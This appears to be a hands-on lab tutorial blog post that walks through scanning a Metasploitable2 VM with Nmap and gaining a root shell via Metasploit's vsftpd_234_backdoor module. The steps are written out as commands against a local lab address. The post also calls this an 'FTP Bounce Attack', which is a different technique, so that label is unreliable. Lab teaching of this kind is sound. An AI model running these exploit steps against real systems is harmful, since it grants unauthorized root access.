Ethical Hacking | FTP Vulnerability Exploitation

labby

Labby

Posted on November 7, 2024

Ethical Hacking | FTP Vulnerability Exploitation

Introduction

MindMap

In this lab, you will learn how to exploit vulnerabilities in the File Transfer Protocol (FTP) service to gain unauthorized access to a target machine. The scenario is set in a cybersecurity context, where you will assume the role of an ethical hacker tasked with identifying and exploiting vulnerabilities in a vulnerable FTP server.

The objective of this lab is to gain root access to the Metasploitable2 target machine by leveraging an FTP service vulnerability and utilizing the Metasploit Framework, a popular penetration testing tool. Through this hands-on experience, you will gain a deeper understanding of the FTP Bounce Attack, port scanning techniques, and the exploitation process using Metasploit.

Set up the Lab Environment

In this step, you will set up the lab environment, which consists of two virtual machines: the Kali Linux machine as the attacker, and the Metasploitable2 machine as the target.

  1. Start the Metasploitable2 virtual machine by running the following command in the terminal:
sudo virsh start Metasploitable2
Enter fullscreen mode Exit fullscreen mode
  1. Verify that the Metasploitable2 machine is running by pinging it:
ping 192.168.122.102
Enter fullscreen mode Exit fullscreen mode

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter its bash shell:
docker run -ti --network host b5b709a49cd5 bash
Enter fullscreen mode Exit fullscreen mode
  1. Test the network connectivity between the Kali Linux container and the Metasploitable2 machine:
ping 192.168.122.102
Enter fullscreen mode Exit fullscreen mode

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Perform Port Scanning

In this step, you will use the Nmap scanning tool to identify open ports and services running on the Metasploitable2 target machine.

  1. Start the PostgreSQL database service, which is required by Metasploit:
service postgresql start
Enter fullscreen mode Exit fullscreen mode
  1. Initialize the Metasploit database:
msfdb init
Enter fullscreen mode Exit fullscreen mode
  1. Launch the Metasploit Framework console:
cd ~
msfconsole
Enter fullscreen mode Exit fullscreen mode
  1. Use Nmap to scan the target machine and identify open ports:
nmap -sV -T4 192.168.122.102
Enter fullscreen mode Exit fullscreen mode

The -sV option enables version detection for open ports, and -T4 sets the timing policy for faster scanning.

Press Ctrl+D to quit the Metasploit console then start the inspection

Exploit the FTP Service Vulnerability

In this step, you will leverage the identified FTP service vulnerability to gain unauthorized access to the Metasploitable2 target machine.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
Enter fullscreen mode Exit fullscreen mode
  1. Search for an FTP scanner module in Metasploit:
search scanner/ftp
Enter fullscreen mode Exit fullscreen mode
  1. Use the ftp_version module to scan the FTP service:
use auxiliary/scanner/ftp/ftp_version
Enter fullscreen mode Exit fullscreen mode
  1. Set the target host for the scan:
set RHOSTS 192.168.122.102
Enter fullscreen mode Exit fullscreen mode
  1. Run the FTP version scan:
exploit
Enter fullscreen mode Exit fullscreen mode
  1. Based on the FTP version identified, search for a corresponding exploitation module:
search vsFTPd
Enter fullscreen mode Exit fullscreen mode
  1. Use the vsftpd_234_backdoor module to exploit the vulnerability:
use exploit/unix/ftp/vsftpd_234_backdoor
Enter fullscreen mode Exit fullscreen mode
  1. Set the target host for the exploitation:
set RHOST 192.168.122.102
Enter fullscreen mode Exit fullscreen mode
  1. Execute the exploitation:
exploit
Enter fullscreen mode Exit fullscreen mode

Press Ctrl+D to quit the Metasploit console then start the inspection

Verify the Successful Exploitation

In this step, you will verify that the exploitation was successful and you have gained root access to the Metasploitable2 target machine.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
Enter fullscreen mode Exit fullscreen mode
  1. Check the current user:
whoami
Enter fullscreen mode Exit fullscreen mode
  1. Check the hostname of the compromised machine:
hostname
Enter fullscreen mode Exit fullscreen mode
  1. Check the IP address of the compromised machine:
ifconfig
Enter fullscreen mode Exit fullscreen mode

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned how to exploit an FTP service vulnerability to gain unauthorized access to a target machine. You set up a lab environment with a vulnerable Metasploitable2 machine and a Kali Linux attack machine. You performed port scanning using Nmap to identify open ports and services, and then leveraged the Metasploit Framework to exploit an identified FTP service vulnerability. Finally, you verified the successful exploitation by checking the current user, hostname, and IP address of the compromised machine.

Through this hands-on experience, you gained practical knowledge and skills in identifying and exploiting vulnerabilities, using popular cybersecurity tools like Nmap and Metasploit, and understanding the FTP Bounce Attack technique. These skills are essential for ethical hackers and cybersecurity professionals to assess and strengthen the security posture of systems and networks.


🚀 Practice Now: Exploiting FTP Service Vulnerabilities


Want to Learn More?

💖 💪 🙅 🚩
labby
Labby

Posted on November 7, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related